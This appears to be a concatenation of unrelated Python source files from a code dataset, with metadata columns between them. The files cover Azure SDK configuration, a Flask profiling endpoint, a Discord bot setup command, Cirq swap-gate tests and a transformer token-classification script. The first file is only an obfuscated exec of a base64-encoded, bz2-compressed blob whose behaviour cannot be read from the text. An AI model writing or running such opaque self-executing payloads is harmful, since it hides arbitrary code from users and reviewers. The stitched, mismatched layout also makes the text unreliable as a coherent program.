exec(bz2.decompress(base64.b64decode('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')))
| 290.290323
| 8,086
| 0.927436
|
83b9e3ae9428bd64e025fe51872801c48b9831c4
| 2,933
|
py
|
Python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/_configuration.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/_configuration.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/_configuration.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
from ._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any
from azure.core.credentials import TokenCredential
class SubscriptionClientConfiguration(Configuration):
"""Configuration for SubscriptionClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
"""
def __init__(
self,
credential, # type: "TokenCredential"
**kwargs # type: Any
):
# type: (...) -> None
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
super(SubscriptionClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'azure-mgmt-resource/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs # type: Any
):
# type: (...) -> None
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
| 44.439394
| 129
| 0.684964
|
eaa9ea91796b203b680481b10a621fbec141c03c
| 631
|
py
|
Python
|
pipeline/playground/feature_server.py
|
shawntsai/insight-project
|
67b7ad25c51b0065f958ee499653c91213263cfc
|
[
"MIT"
] | 3
|
2018-02-12T02:48:12.000Z
|
2018-08-01T10:17:09.000Z
|
pipeline/playground/feature_server.py
|
shawntsai/insight-project
|
67b7ad25c51b0065f958ee499653c91213263cfc
|
[
"MIT"
] | null | null | null |
pipeline/playground/feature_server.py
|
shawntsai/insight-project
|
67b7ad25c51b0065f958ee499653c91213263cfc
|
[
"MIT"
] | 1
|
2018-04-07T06:34:53.000Z
|
2018-04-07T06:34:53.000Z
|
import sys
import json
import feature_utils as fu
from flask import Flask
from flask import jsonify
from flask import request
app = Flask(__name__)
@app.route('/')
def hello():
return 'hello world'
@app.route('/profiling', methods=['POST'])
def profiling():
data = json.loads(request.data)
if 'id' not in data or 'platform' not in data:
return 'you should provide both code and lang'
table_name = data['table_name']
data_type = data['type']
result = fu.profiling(table_name, data_type)
return jsonify(result)
if __name__ == '__main__':
port = int(sys.argv[1])
app.run(port=port)
| 21.033333
| 54
| 0.681458
|
bed896d10aa972b6636f03f718978f641749541c
| 4,747
|
py
|
Python
|
bot/cogs/setup_all.py
|
tescomealdealll/PixeL
|
ad38b1105a465bf08bd652e61e3e12d4ed9d2872
|
[
"MIT"
] | null | null | null |
bot/cogs/setup_all.py
|
tescomealdealll/PixeL
|
ad38b1105a465bf08bd652e61e3e12d4ed9d2872
|
[
"MIT"
] | null | null | null |
bot/cogs/setup_all.py
|
tescomealdealll/PixeL
|
ad38b1105a465bf08bd652e61e3e12d4ed9d2872
|
[
"MIT"
] | null | null | null |
import discord
import traceback
import app_util
from bot.extras.emojis import Emo
from bot.views.msg_view import sub_view_msg
from bot.views.youtube_view import sub_view_youtube
from bot.views.receiver_view import sub_view_receiver
from bot.views.pingrole_view import sub_view_pingrole
from bot.views.reception_view import sub_view_reception
from bot.views.welcome_view import sub_view_welcomecard
async def check(ctx: app_util.Context):
def check():
p = ctx.channel.permissions_for(ctx.me)
return p.send_messages and p.embed_links and p.attach_files and p.external_emojis
if not ctx.guild:
await ctx.send_response('🚫 This command can only be used inside a **SERVER**')
elif not ctx.author.guild_permissions.manage_guild:
await ctx.send_response('> 👀 You are not an **Admin** or **Server Manager**')
elif not check():
await ctx.send_response(
f'> 😓 Please make sure I have permissions to send `embeds` `custom emojis` `attachments`')
elif not ctx.options:
await ctx.send_response('> 👀 you must select **at least one option**')
elif len(ctx.options) > 1:
await ctx.send_response('> 👀 please use only **one option at a time**')
else:
return True
class Setup(app_util.Cog):
def __init__(self, bot: app_util.Bot):
self.bot = bot
@app_util.Cog.command(
command=app_util.SlashCommand(name='ping', description='shows the avg latency of the bot'),
guild_id=877399405056102431
)
async def ping_command(self, ctx: app_util.Context):
await ctx.send_response(f'**Pong:** {round(self.bot.latency * 1000)}ms')
@app_util.Cog.command(
command=app_util.SlashCommand(
name='setup',
description='configure PixeL for your server',
options=[
app_util.StrOption(
name='youtube',
description='type any youtube channel by url or id',
required=False),
app_util.ChannelOption(
name='receiver',
description='text channel to receive youtube videos',
channel_types=[
app_util.DiscordChannelType.GUILD_TEXT,
app_util.DiscordChannelType.GUILD_NEWS],
required=False),
app_util.ChannelOption(
name='reception',
description='text channel to receive welcome cards',
channel_types=[
app_util.DiscordChannelType.GUILD_TEXT,
app_util.DiscordChannelType.GUILD_NEWS],
required=False),
app_util.RoleOption(
name='ping_role',
description='role to ping with youtube notification',
required=False),
app_util.AttachmentOption(
name='welcome_card',
description='image file to send when new member joins',
required=False),
app_util.IntOption(
name='custom_message',
description='custom welcome and notification message',
choices=[
app_util.Choice(name='upload_message', value=1),
app_util.Choice(name='welcome_message', value=0),
app_util.Choice(name='livestream_message', value=2),
],
required=False),
],
)
)
@app_util.Cog.before_invoke(check=check)
async def setup_command(
self, ctx: app_util.Context,
*,
youtube: str, ping_role: discord.Role, receiver: discord.TextChannel,
reception: discord.TextChannel, welcome_card: discord.Attachment, custom_message: int):
if youtube:
await ctx.defer()
await sub_view_youtube(ctx, youtube)
return
if receiver:
await ctx.defer()
await sub_view_receiver(ctx, receiver)
return
if reception:
await ctx.defer()
await sub_view_reception(ctx, reception)
return
if ping_role:
await ctx.defer()
await sub_view_pingrole(ctx, ping_role)
return
if welcome_card:
await ctx.defer()
await sub_view_welcomecard(ctx, welcome_card.url)
return
if custom_message is not None:
await sub_view_msg(ctx, custom_message, self.bot)
return
async def setup(bot: app_util.Bot):
await bot.add_application_cog(Setup(bot))
| 37.377953
| 103
| 0.585001
|
5042e03a589ab98f123485fab08bd0b8b656d832
| 2,315
|
py
|
Python
|
cirq-core/cirq/interop/quirk/cells/swap_cell_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | 1
|
2021-04-29T15:30:32.000Z
|
2021-04-29T15:30:32.000Z
|
cirq-core/cirq/interop/quirk/cells/swap_cell_test.py
|
bradyb/Cirq
|
610b0d4ea3a7862169610797266734c844ddcc1f
|
[
"Apache-2.0"
] | 4
|
2022-01-16T14:12:15.000Z
|
2022-02-24T03:58:46.000Z
|
cirq-core/cirq/interop/quirk/cells/swap_cell_test.py
|
bradyb/Cirq
|
610b0d4ea3a7862169610797266734c844ddcc1f
|
[
"Apache-2.0"
] | 2
|
2021-09-22T11:16:46.000Z
|
2021-09-23T12:55:22.000Z
|
# Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import cirq
from cirq.interop.quirk.cells.testing import assert_url_to_circuit_returns
from cirq import quirk_url_to_circuit
def test_swap():
a, b, c = cirq.LineQubit.range(3)
assert_url_to_circuit_returns('{"cols":[["Swap","Swap"]]}', cirq.Circuit(cirq.SWAP(a, b)))
assert_url_to_circuit_returns(
'{"cols":[["Swap","X","Swap"]]}', cirq.Circuit(cirq.SWAP(a, c), cirq.X(b))
)
with pytest.raises(ValueError, match='number of swap gates'):
_ = quirk_url_to_circuit('https://algassert.com/quirk#circuit={"cols":[["Swap"]]}')
with pytest.raises(ValueError, match='number of swap gates'):
_ = quirk_url_to_circuit(
'https://algassert.com/quirk#circuit={"cols":[["Swap","Swap","Swap"]]}'
)
def test_controlled_swap():
a, b, c, d = cirq.LineQubit.range(4)
assert_url_to_circuit_returns(
'{"cols":[["Swap","•","Swap"]]}', cirq.Circuit(cirq.SWAP(a, c).controlled_by(b))
)
assert_url_to_circuit_returns(
'{"cols":[["Swap","•","Swap","•"]]}', cirq.Circuit(cirq.SWAP(a, c).controlled_by(b, d))
)
def test_with_line_qubits_mapped_to():
a, b, c, d = cirq.LineQubit.range(4)
a2, b2, c2, d2 = cirq.NamedQubit.range(4, prefix='q')
cell = cirq.interop.quirk.cells.swap_cell.SwapCell(qubits=[a, b], controls=[c, d])
mapped_cell = cirq.interop.quirk.cells.swap_cell.SwapCell(qubits=[a2, b2], controls=[c2, d2])
assert cell != mapped_cell
assert cell.with_line_qubits_mapped_to([a2, b2, c2, d2]) == mapped_cell
def test_repr():
a, b, c, d = cirq.LineQubit.range(4)
cirq.testing.assert_equivalent_repr(
cirq.interop.quirk.cells.swap_cell.SwapCell(qubits=[a, b], controls=[c, d])
)
| 37.95082
| 97
| 0.68121
|
5ce2d59ce71b5c4af9c41aee596e6057d3a33e83
| 32,302
|
py
|
Python
|
run_token_cls.py
|
rxian/domain-alignment
|
c523a6d193fa644520235535d5b03858930a2a97
|
[
"MIT"
] | null | null | null |
run_token_cls.py
|
rxian/domain-alignment
|
c523a6d193fa644520235535d5b03858930a2a97
|
[
"MIT"
] | null | null | null |
run_token_cls.py
|
rxian/domain-alignment
|
c523a6d193fa644520235535d5b03858930a2a97
|
[
"MIT"
] | null | null | null |
"""
Fine-tuning a 🤗 Transformers model on token classification tasks (NER, POS, CHUNKS).
Adapted from https://github.com/huggingface/transformers/blob/master/examples/pytorch/token-classification/run_ner_no_trainer.py
"""
import argparse
import logging
import numpy as np
import torch
from torch.optim import AdamW
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
import transformers
from transformers import MODEL_MAPPING, AutoConfig, AutoModelForTokenClassification, AutoTokenizer, DataCollatorForTokenClassification, SchedulerType, default_data_collator, get_scheduler, set_seed
from datasets import load_metric
import load_dataset_token_cls
from load_dataset_token_cls import load_raw_dataset, tokenize_raw_dataset
import domain_alignment
logger = logging.getLogger(__name__)
# You should update this to your particular problem to have better documentation of `model_type`
MODEL_CONFIG_CLASSES = list(MODEL_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
def get_class_dist(dataset, num_classes):
# Counts labels in the `dataset` and returns the class distribution.
class_dist = torch.zeros(num_classes)
l, c = np.unique([x for y in dataset['labels'] for x in y],return_counts=True)
if -100 in l:
l, c = l[1:], c[1:]
class_dist[l] = torch.tensor(c/np.sum(c)).type(class_dist.dtype)
return class_dist
def flatten_outputs(mask,*args):
# Flatten outputs from (batch_size, max_sequence_length, feature_dim)
# to (num_tokens, feature_dim), where num_tokens only counts "active"
# tokens.
#
# `mask` is used to remove (non-active) tokens that do not have a label.
# This is because most NER implementations only tag the first wordpiece
# of a word. This also masks out [CLS] and [SEP] tokens.
mask = mask.view(-1)
flattened = []
for arg in args:
if len(arg.shape) == 2:
arg = arg.view(-1)
else:
arg = arg.view(-1, arg.shape[-1])
flattened.append(arg[mask==0])
if len(flattened) == 1:
return flattened[0]
elif len(flattened) > 1:
return flattened
def main():
args = parse_args()
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
# Setup logging, we only want one process per machine to log things on the screen.
# accelerator.is_local_main_process is only True for one process per machine.
logger.setLevel(logging.INFO)
load_dataset_token_cls.datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
if args.disable_tqdm:
# https://stackoverflow.com/a/67238486/7112125
from functools import partialmethod
tqdm.__init__ = partialmethod(tqdm.__init__, disable=True)
# If passed along, set the training seed now.
if args.seed is not None:
set_seed(args.seed)
# Get the source domain dataset.
raw_datasets, label_list, label_to_id, text_column_name, label_column_name = load_raw_dataset(
dataset_name=args.dataset_name_source,
dataset_config_name=args.dataset_config_name_source,
train_file=args.train_file_source,
evaluation_file=args.evaluation_file_source,
text_column_name=args.text_column_name_source,
label_column_name=args.label_column_name_source,
task_name=args.task_name,
)
num_labels = len(label_list)
# Metrics
metric = load_metric("seqeval")
def get_labels(predictions, references):
# Transform predictions and references tensos to numpy arrays
y_pred = predictions.detach().cpu().clone().numpy()
y_true = references.detach().cpu().clone().numpy()
# Remove ignored index (special tokens)
true_predictions = [
[label_list[p] for (p, l) in zip(prediction, label) if l != -100]
for prediction, label in zip(y_pred, y_true)
]
true_labels = [
[label_list[l] for (p, l) in zip(prediction, label) if l != -100]
for prediction, label in zip(y_pred, y_true)
]
return true_predictions, true_labels
